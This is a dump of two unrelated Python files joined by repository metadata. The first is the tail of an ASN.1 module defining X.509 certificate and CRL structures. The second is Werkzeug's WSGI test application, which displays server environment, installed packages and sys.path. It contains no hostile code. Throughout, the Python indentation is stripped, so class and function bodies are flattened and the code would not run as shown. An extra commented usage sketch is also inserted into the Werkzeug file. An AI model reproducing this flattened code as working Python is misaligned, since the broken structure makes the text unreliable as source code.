class TeletexCommonName(char.TeletexString):
subtypeSpec = char.TeletexString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_common_name_length)
class CommonName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_common_name_length)
common_name = univ.Integer(1)
class ExtensionAttribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('extension-attribute-type', univ.Integer().subtype(subtypeSpec=constraint.ValueSizeConstraint(0, ub_extension_attributes), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('extension-attribute-value', univ.Any().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class ExtensionAttributes(univ.SetOf):
componentType = ExtensionAttribute()
subtypeSpec = univ.SetOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_extension_attributes)
class BuiltInDomainDefinedAttribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_defined_attribute_type_length))),
namedtype.NamedType('value', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_defined_attribute_value_length)))
)
class BuiltInDomainDefinedAttributes(univ.SequenceOf):
componentType = BuiltInDomainDefinedAttribute()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_domain_defined_attributes)
class OrganizationalUnitName(char.PrintableString):
    subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_unit_name_length)
class OrganizationalUnitNames(univ.SequenceOf):
componentType = OrganizationalUnitName()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organizational_units)
class PersonalName(univ.Set):
componentType = namedtype.NamedTypes(
namedtype.NamedType('surname', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_surname_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('given-name', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_given_name_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('initials', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_initials_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('generation-qualifier', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_generation_qualifier_length), explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3)))
)
class NumericUserIdentifier(char.NumericString):
subtypeSpec = char.NumericString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_numeric_user_id_length)
class OrganizationName(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_organization_name_length)
class PrivateDomainName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('numeric', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_name_length))),
namedtype.NamedType('printable', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, ub_domain_name_length)))
)
class TerminalIdentifier(char.PrintableString):
subtypeSpec = char.PrintableString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_terminal_id_length)
class X121Address(char.NumericString):
subtypeSpec = char.NumericString.subtypeSpec + constraint.ValueSizeConstraint(1, ub_x121_address_length)
class NetworkAddress(X121Address): pass
class AdministrationDomainName(univ.Choice):
tagSet = univ.Choice.tagSet.tagExplicitly(
tag.Tag(tag.tagClassApplication, tag.tagFormatConstructed, 2)
)
componentType = namedtype.NamedTypes(
namedtype.NamedType('numeric', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(0, ub_domain_name_length))),
namedtype.NamedType('printable', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(0, ub_domain_name_length)))
)
class CountryName(univ.Choice):
tagSet = univ.Choice.tagSet.tagExplicitly(
tag.Tag(tag.tagClassApplication, tag.tagFormatConstructed, 1)
)
componentType = namedtype.NamedTypes(
namedtype.NamedType('x121-dcc-code', char.NumericString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_numeric_length, ub_country_name_numeric_length))),
namedtype.NamedType('iso-3166-alpha2-code', char.PrintableString().subtype(subtypeSpec=constraint.ValueSizeConstraint(ub_country_name_alpha_length, ub_country_name_alpha_length)))
)
class BuiltInStandardAttributes(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('country-name', CountryName()),
namedtype.OptionalNamedType('administration-domain-name', AdministrationDomainName()),
namedtype.OptionalNamedType('network-address', NetworkAddress().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('terminal-identifier', TerminalIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('private-domain-name', PrivateDomainName().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('organization-name', OrganizationName().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.OptionalNamedType('numeric-user-identifier', NumericUserIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4))),
namedtype.OptionalNamedType('personal-name', PersonalName().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 5))),
namedtype.OptionalNamedType('organizational-unit-names', OrganizationalUnitNames().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 6)))
)
class ORAddress(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('built-in-standard-attributes', BuiltInStandardAttributes()),
namedtype.OptionalNamedType('built-in-domain-defined-attributes', BuiltInDomainDefinedAttributes()),
namedtype.OptionalNamedType('extension-attributes', ExtensionAttributes())
)
#
# PKIX1Implicit88
#
id_ce_invalidityDate = univ.ObjectIdentifier('2.5.29.24')
class InvalidityDate(useful.GeneralizedTime): pass
id_holdinstruction_none = univ.ObjectIdentifier('2.2.840.10040.2.1')
id_holdinstruction_callissuer = univ.ObjectIdentifier('2.2.840.10040.2.2')
id_holdinstruction_reject = univ.ObjectIdentifier('2.2.840.10040.2.3')
holdInstruction = univ.ObjectIdentifier('2.2.840.10040.2')
id_ce_holdInstructionCode = univ.ObjectIdentifier('2.5.29.23')
class HoldInstructionCode(univ.ObjectIdentifier): pass
id_ce_cRLReasons = univ.ObjectIdentifier('2.5.29.21')
class CRLReason(univ.Enumerated):
namedValues = namedval.NamedValues(
('unspecified', 0),
('keyCompromise', 1),
('cACompromise', 2),
('affiliationChanged', 3),
('superseded', 4),
('cessationOfOperation', 5),
('certificateHold', 6),
('removeFromCRL', 8)
)
id_ce_cRLNumber = univ.ObjectIdentifier('2.5.29.20')
class CRLNumber(univ.Integer):
    subtypeSpec = univ.Integer.subtypeSpec + constraint.ValueSizeConstraint(0, MAX)
class BaseCRLNumber(CRLNumber): pass
id_kp_serverAuth = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.1')
id_kp_clientAuth = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.2')
id_kp_codeSigning = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.3')
id_kp_emailProtection = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.4')
id_kp_ipsecEndSystem = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.5')
id_kp_ipsecTunnel = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.6')
id_kp_ipsecUser = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.7')
id_kp_timeStamping = univ.ObjectIdentifier('1.3.6.1.5.5.7.3.8')
id_pe_authorityInfoAccess = univ.ObjectIdentifier('1.3.6.1.5.5.7.1.1')
id_ce_extKeyUsage = univ.ObjectIdentifier('2.5.29.37')
class KeyPurposeId(univ.ObjectIdentifier): pass
class ExtKeyUsageSyntax(univ.SequenceOf):
componentType = KeyPurposeId()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class ReasonFlags(univ.BitString):
namedValues = namedval.NamedValues(
('unused', 0),
('keyCompromise', 1),
('cACompromise', 2),
('affiliationChanged', 3),
('superseded', 4),
('cessationOfOperation', 5),
('certificateHold', 6)
)
class SkipCerts(univ.Integer):
subtypeSpec = univ.Integer.subtypeSpec + constraint.ValueSizeConstraint(0, MAX)
id_ce_policyConstraints = univ.ObjectIdentifier('2.5.29.36')
class PolicyConstraints(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('requireExplicitPolicy', SkipCerts().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('inhibitPolicyMapping', SkipCerts().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
id_ce_basicConstraints = univ.ObjectIdentifier('2.5.29.19')
class BasicConstraints(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('cA', univ.Boolean(False)),
namedtype.OptionalNamedType('pathLenConstraint', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(0, MAX)))
)
id_ce_subjectDirectoryAttributes = univ.ObjectIdentifier('2.5.29.9')
class SubjectDirectoryAttributes(univ.SequenceOf):
componentType = Attribute()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class EDIPartyName(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('nameAssigner', DirectoryString().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('partyName', DirectoryString().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
class AnotherName(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type-id', univ.ObjectIdentifier()),
namedtype.NamedType('value', univ.Any().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0)))
)
class GeneralName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('otherName', AnotherName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.NamedType('rfc822Name', char.IA5String().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.NamedType('dNSName', char.IA5String().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.NamedType('x400Address', ORAddress().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.NamedType('directoryName', Name().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4))),
namedtype.NamedType('ediPartyName', EDIPartyName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 5))),
namedtype.NamedType('uniformResourceIdentifier', char.IA5String().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 6))),
namedtype.NamedType('iPAddress', univ.OctetString().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 7))),
namedtype.NamedType('registeredID', univ.ObjectIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 8)))
)
class GeneralNames(univ.SequenceOf):
componentType = GeneralName()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class AccessDescription(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('accessMethod', univ.ObjectIdentifier()),
namedtype.NamedType('accessLocation', GeneralName())
)
class AuthorityInfoAccessSyntax(univ.SequenceOf):
componentType = AccessDescription()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_deltaCRLIndicator = univ.ObjectIdentifier('2.5.29.27')
class DistributionPointName(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('fullName', GeneralNames().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.NamedType('nameRelativeToCRLIssuer', RelativeDistinguishedName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
class DistributionPoint(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('distributionPoint', DistributionPointName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('reasons', ReasonFlags().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('cRLIssuer', GeneralNames().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 2)))
)
class BaseDistance(univ.Integer):
subtypeSpec = univ.Integer.subtypeSpec + constraint.ValueRangeConstraint(0, MAX)
id_ce_cRLDistributionPoints = univ.ObjectIdentifier('2.5.29.31')
class CRLDistPointsSyntax(univ.SequenceOf):
    componentType = DistributionPoint()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_issuingDistributionPoint = univ.ObjectIdentifier('2.5.29.28')
class IssuingDistributionPoint(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('distributionPoint', DistributionPointName().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.NamedType('onlyContainsUserCerts', univ.Boolean(False).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.NamedType('onlyContainsCACerts', univ.Boolean(False).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('onlySomeReasons', ReasonFlags().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.NamedType('indirectCRL', univ.Boolean(False).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4)))
)
class GeneralSubtree(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('base', GeneralName()),
namedtype.NamedType('minimum', BaseDistance(0).subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('maximum', BaseDistance().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
class GeneralSubtrees(univ.SequenceOf):
componentType = GeneralSubtree()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_nameConstraints = univ.ObjectIdentifier('2.5.29.30')
class NameConstraints(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('permittedSubtrees', GeneralSubtrees().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('excludedSubtrees', GeneralSubtrees().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class DisplayText(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('visibleString', char.VisibleString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 200))),
namedtype.NamedType('bmpString', char.BMPString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 200))),
namedtype.NamedType('utf8String', char.UTF8String().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 200)))
)
class NoticeReference(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('organization', DisplayText()),
namedtype.NamedType('noticeNumbers', univ.SequenceOf(componentType=univ.Integer()))
)
class UserNotice(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('noticeRef', NoticeReference()),
namedtype.OptionalNamedType('explicitText', DisplayText())
)
class CPSuri(char.IA5String): pass
class PolicyQualifierId(univ.ObjectIdentifier):
subtypeSpec = univ.ObjectIdentifier.subtypeSpec + constraint.SingleValueConstraint(id_qt_cps, id_qt_unotice)
class CertPolicyId(univ.ObjectIdentifier): pass
class PolicyQualifierInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('policyQualifierId', PolicyQualifierId()),
namedtype.NamedType('qualifier', univ.Any())
)
id_ce_certificatePolicies = univ.ObjectIdentifier('2.5.29.32')
class PolicyInformation(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('policyIdentifier', CertPolicyId()),
namedtype.OptionalNamedType('policyQualifiers', univ.SequenceOf(componentType=PolicyQualifierInfo()).subtype(subtypeSpec=constraint.ValueSizeConstraint(1, MAX)))
)
class CertificatePolicies(univ.SequenceOf):
componentType = PolicyInformation()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_policyMappings = univ.ObjectIdentifier('2.5.29.33')
class PolicyMapping(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('issuerDomainPolicy', CertPolicyId()),
namedtype.NamedType('subjectDomainPolicy', CertPolicyId())
)
class PolicyMappings(univ.SequenceOf):
componentType = PolicyMapping()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
id_ce_privateKeyUsagePeriod = univ.ObjectIdentifier('2.5.29.16')
class PrivateKeyUsagePeriod(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('notBefore', useful.GeneralizedTime().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('notAfter', useful.GeneralizedTime().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1)))
)
id_ce_keyUsage = univ.ObjectIdentifier('2.5.29.15')
class KeyUsage(univ.BitString):
namedValues = namedval.NamedValues(
('digitalSignature', 0),
('nonRepudiation', 1),
('keyEncipherment', 2),
('dataEncipherment', 3),
('keyAgreement', 4),
('keyCertSign', 5),
('cRLSign', 6),
('encipherOnly', 7),
('decipherOnly', 8)
)
id_ce = univ.ObjectIdentifier('2.5.29')
id_ce_authorityKeyIdentifier = univ.ObjectIdentifier('2.5.29.35')
class KeyIdentifier(univ.OctetString): pass
id_ce_subjectKeyIdentifier = univ.ObjectIdentifier('2.5.29.14')
class SubjectKeyIdentifier(KeyIdentifier): pass
class AuthorityKeyIdentifier(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('keyIdentifier', KeyIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('authorityCertIssuer', GeneralNames().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 1))),
namedtype.OptionalNamedType('authorityCertSerialNumber', CertificateSerialNumber().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2)))
)
id_ce_certificateIssuer = univ.ObjectIdentifier('2.5.29.29')
class CertificateIssuer(GeneralNames): pass
id_ce_subjectAltName = univ.ObjectIdentifier('2.5.29.17')
class SubjectAltName(GeneralNames): pass
id_ce_issuerAltName = univ.ObjectIdentifier('2.5.29.18')
class IssuerAltName(GeneralNames): pass
|
kehao95/Wechat_LearnHelper
|
refs/heads/master
|
src/env/lib/python3.5/site-packages/werkzeug/testapp.py
|
364
|
# -*- coding: utf-8 -*-
"""
werkzeug.testapp
~~~~~~~~~~~~~~~~
Provide a small test application that can be used to test a WSGI server
and check it for WSGI compliance.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import werkzeug
from textwrap import wrap
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.utils import escape
import base64
logo = Response(base64.b64decode('''
R0lGODlhoACgAOMIAAEDACwpAEpCAGdgAJaKAM28AOnVAP3rAP/////////
//////////////////////yH5BAEKAAgALAAAAACgAKAAAAT+EMlJq704680R+F0ojmRpnuj0rWnrv
nB8rbRs33gu0bzu/0AObxgsGn3D5HHJbCUFyqZ0ukkSDlAidctNFg7gbI9LZlrBaHGtzAae0eloe25
7w9EDOX2fst/xenyCIn5/gFqDiVVDV4aGeYiKkhSFjnCQY5OTlZaXgZp8nJ2ekaB0SQOjqphrpnOiq
ncEn65UsLGytLVmQ6m4sQazpbtLqL/HwpnER8bHyLrLOc3Oz8PRONPU1crXN9na263dMt/g4SzjMeX
m5yDpLqgG7OzJ4u8lT/P69ej3JPn69kHzN2OIAHkB9RUYSFCFQYQJFTIkCDBiwoXWGnowaLEjRm7+G
p9A7Hhx4rUkAUaSLJlxHMqVMD/aSycSZkyTplCqtGnRAM5NQ1Ly5OmzZc6gO4d6DGAUKA+hSocWYAo
SlM6oUWX2O/o0KdaVU5vuSQLAa0ADwQgMEMB2AIECZhVSnTno6spgbtXmHcBUrQACcc2FrTrWS8wAf
78cMFBgwIBgbN+qvTt3ayikRBk7BoyGAGABAdYyfdzRQGV3l4coxrqQ84GpUBmrdR3xNIDUPAKDBSA
ADIGDhhqTZIWaDcrVX8EsbNzbkvCOxG8bN5w8ly9H8jyTJHC6DFndQydbguh2e/ctZJFXRxMAqqPVA
tQH5E64SPr1f0zz7sQYjAHg0In+JQ11+N2B0XXBeeYZgBZFx4tqBToiTCPv0YBgQv8JqA6BEf6RhXx
w1ENhRBnWV8ctEX4Ul2zc3aVGcQNC2KElyTDYyYUWvShdjDyMOGMuFjqnII45aogPhz/CodUHFwaDx
lTgsaOjNyhGWJQd+lFoAGk8ObghI0kawg+EV5blH3dr+digkYuAGSaQZFHFz2P/cTaLmhF52QeSb45
Jwxd+uSVGHlqOZpOeJpCFZ5J+rkAkFjQ0N1tah7JJSZUFNsrkeJUJMIBi8jyaEKIhKPomnC91Uo+NB
yyaJ5umnnpInIFh4t6ZSpGaAVmizqjpByDegYl8tPE0phCYrhcMWSv+uAqHfgH88ak5UXZmlKLVJhd
dj78s1Fxnzo6yUCrV6rrDOkluG+QzCAUTbCwf9SrmMLzK6p+OPHx7DF+bsfMRq7Ec61Av9i6GLw23r
idnZ+/OO0a99pbIrJkproCQMA17OPG6suq3cca5ruDfXCCDoS7BEdvmJn5otdqscn+uogRHHXs8cbh
EIfYaDY1AkrC0cqwcZpnM6ludx72x0p7Fo/hZAcpJDjax0UdHavMKAbiKltMWCF3xxh9k25N/Viud8
ba78iCvUkt+V6BpwMlErmcgc502x+u1nSxJSJP9Mi52awD1V4yB/QHONsnU3L+A/zR4VL/indx/y64
gqcj+qgTeweM86f0Qy1QVbvmWH1D9h+alqg254QD8HJXHvjQaGOqEqC22M54PcftZVKVSQG9jhkv7C
JyTyDoAJfPdu8v7DRZAxsP/ky9MJ3OL36DJfCFPASC3/aXlfLOOON9vGZZHydGf8LnxYJuuVIbl83y
Az5n/RPz07E+9+zw2A2ahz4HxHo9Kt79HTMx1Q7ma7zAzHgHqYH0SoZWyTuOLMiHwSfZDAQTn0ajk9
YQqodnUYjByQZhZak9Wu4gYQsMyEpIOAOQKze8CmEF45KuAHTvIDOfHJNipwoHMuGHBnJElUoDmAyX
c2Qm/R8Ah/iILCCJOEokGowdhDYc/yoL+vpRGwyVSCWFYZNljkhEirGXsalWcAgOdeAdoXcktF2udb
qbUhjWyMQxYO01o6KYKOr6iK3fE4MaS+DsvBsGOBaMb0Y6IxADaJhFICaOLmiWTlDAnY1KzDG4ambL
cWBA8mUzjJsN2KjSaSXGqMCVXYpYkj33mcIApyhQf6YqgeNAmNvuC0t4CsDbSshZJkCS1eNisKqlyG
cF8G2JeiDX6tO6Mv0SmjCa3MFb0bJaGPMU0X7c8XcpvMaOQmCajwSeY9G0WqbBmKv34DsMIEztU6Y2
KiDlFdt6jnCSqx7Dmt6XnqSKaFFHNO5+FmODxMCWBEaco77lNDGXBM0ECYB/+s7nKFdwSF5hgXumQe
EZ7amRg39RHy3zIjyRCykQh8Zo2iviRKyTDn/zx6EefptJj2Cw+Ep2FSc01U5ry4KLPYsTyWnVGnvb
UpyGlhjBUljyjHhWpf8OFaXwhp9O4T1gU9UeyPPa8A2l0p1kNqPXEVRm1AOs1oAGZU596t6SOR2mcB
Oco1srWtkaVrMUzIErrKri85keKqRQYX9VX0/eAUK1hrSu6HMEX3Qh2sCh0q0D2CtnUqS4hj62sE/z
aDs2Sg7MBS6xnQeooc2R2tC9YrKpEi9pLXfYXp20tDCpSP8rKlrD4axprb9u1Df5hSbz9QU0cRpfgn
kiIzwKucd0wsEHlLpe5yHXuc6FrNelOl7pY2+11kTWx7VpRu97dXA3DO1vbkhcb4zyvERYajQgAADs
='''), mimetype='image/png')
TEMPLATE = u'''\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<title>WSGI Information</title>
<style type="text/css">
@import url(http://fonts.googleapis.com/css?family=Ubuntu);
body { font-family: 'Lucida Grande', 'Lucida Sans Unicode', 'Geneva',
'Verdana', sans-serif; background-color: white; color: #000;
font-size: 15px; text-align: center; }
#logo { float: right; padding: 0 0 10px 10px; }
div.box { text-align: left; width: 45em; margin: auto; padding: 50px 0;
background-color: white; }
h1, h2 { font-family: 'Ubuntu', 'Lucida Grande', 'Lucida Sans Unicode',
'Geneva', 'Verdana', sans-serif; font-weight: normal; }
h1 { margin: 0 0 30px 0; }
h2 { font-size: 1.4em; margin: 1em 0 0.5em 0; }
table { width: 100%%; border-collapse: collapse; border: 1px solid #AFC5C9 }
table th { background-color: #AFC1C4; color: white; font-size: 0.72em;
font-weight: normal; width: 18em; vertical-align: top;
padding: 0.5em 0 0.1em 0.5em; }
table td { border: 1px solid #AFC5C9; padding: 0.1em 0 0.1em 0.5em; }
code { font-family: 'Consolas', 'Monaco', 'Bitstream Vera Sans Mono',
monospace; font-size: 0.7em; }
ul li { line-height: 1.5em; }
ul.path { font-size: 0.7em; margin: 0 -30px; padding: 8px 30px;
list-style: none; background: #E8EFF0; }
ul.path li { line-height: 1.6em; }
li.virtual { color: #999; text-decoration: underline; }
li.exp { background: white; }
</style>
<div class="box">
<img src="?resource=logo" id="logo" alt="[The Werkzeug Logo]" />
<h1>WSGI Information</h1>
<p>
This page displays all available information about the WSGI server and
the underlying Python interpreter.
<h2 id="python-interpreter">Python Interpreter</h2>
<table>
<tr>
<th>Python Version
<td>%(python_version)s
<tr>
<th>Platform
<td>%(platform)s [%(os)s]
<tr>
<th>API Version
<td>%(api_version)s
<tr>
<th>Byteorder
<td>%(byteorder)s
<tr>
<th>Werkzeug Version
<td>%(werkzeug_version)s
</table>
<h2 id="wsgi-environment">WSGI Environment</h2>
<table>%(wsgi_env)s</table>
<h2 id="installed-eggs">Installed Eggs</h2>
<p>
The following python packages were installed on the system as
Python eggs:
<ul>%(python_eggs)s</ul>
<h2 id="sys-path">System Path</h2>
<p>
The following paths are the current contents of the load path. The
following entries are looked up for Python packages. Note that not
all items in this path are folders. Gray and underlined items are
entries pointing to invalid resources or used by custom import hooks
such as the zip importer.
<p>
Items with a bright background were expanded for display from a relative
path. If you encounter such paths in the output you might want to check
your setup as relative paths are usually problematic in multithreaded
environments.
<ul class="path">%(sys_path)s</ul>
</div>
'''
def iter_sys_path():
if os.name == 'posix':
def strip(x):
prefix = os.path.expanduser('~')
if x.startswith(prefix):
x = '~' + x[len(prefix):]
return x
else:
strip = lambda x: x
cwd = os.path.abspath(os.getcwd())
for item in sys.path:
path = os.path.join(cwd, item or os.path.curdir)
yield strip(os.path.normpath(path)), \
not os.path.isdir(path), path != item
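# Illustrative usage sketch, not part of the original module: render_testapp() below
# consumes iter_sys_path() in exactly this way; each yielded tuple is
# (display_path, is_virtual, was_expanded), and any concrete output is hypothetical.
#
#     for display, virtual, expanded in iter_sys_path():
#         print(display, virtual, expanded)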
def render_testapp(req):
try:
import pkg_resources
except ImportError:
eggs = ()
else:
eggs = sorted(pkg_resources.working_set,
key=lambda x: x.project_name.lower())
python_eggs = []
for egg in eggs:
try:
version = egg.version
except (ValueError, AttributeError):
version = 'unknown'
python_eggs.append('<li>%s <small>[%s]</small>' % (
escape(egg.project_name),
escape(version)
))
wsgi_env = []
sorted_environ = sorted(req.environ.items(),
key=lambda x: repr(x[0]).lower())
for key, value in sorted_environ:
wsgi_env.append('<tr><th>%s<td><code>%s</code>' % (
escape(str(key)),
' '.join(wrap(escape(repr(value))))
))
sys_path = []
for item, virtual, expanded in iter_sys_path():
class_ = []
if virtual:
class_.append('virtual')
if expanded:
class_.append('exp')
sys_path.append('<li%s>%s' % (
class_ and ' class="%s"' % ' '.join(class_) or '',
escape(item)
))
return (TEMPLATE % {
'python_version': '<br>'.join(escape(sys.version).splitlines()),
'platform': escape(sys.platform),
'os': escape(os.name),
'api_version': sys.api_version,
'byteorder': sys.byteorder,
'werkzeug_version': werkzeug.__version__,
'python_eggs': '\n'.join(python_eggs),
'wsgi_env': '\n'.join(wsgi_env),
'sys_path': '\n'.join(sys_path)
}).encode('utf-8')
def test_app(environ, start_response):
"""Simple test application that dumps the environment. You can use
it to check if Werkzeug is working properly:
.. sourcecode:: pycon
>>> from werkzeug.serving import run_simple
>>> from werkzeug.testapp import test_app
>>> run_simple('localhost', 3000, test_app)
* Running on http://localhost:3000/
The application displays important information from the WSGI environment,
the Python interpreter and the installed libraries.
"""
req = Request(environ, populate_request=False)
if req.args.get('resource') == 'logo':
response = logo
else:
response = Response(render_testapp(req), mimetype='text/html')
return response(environ, start_response)
if __name__ == '__main__':
from werkzeug.serving import run_simple
run_simple('localhost', 5000, test_app, use_reloader=True)
|
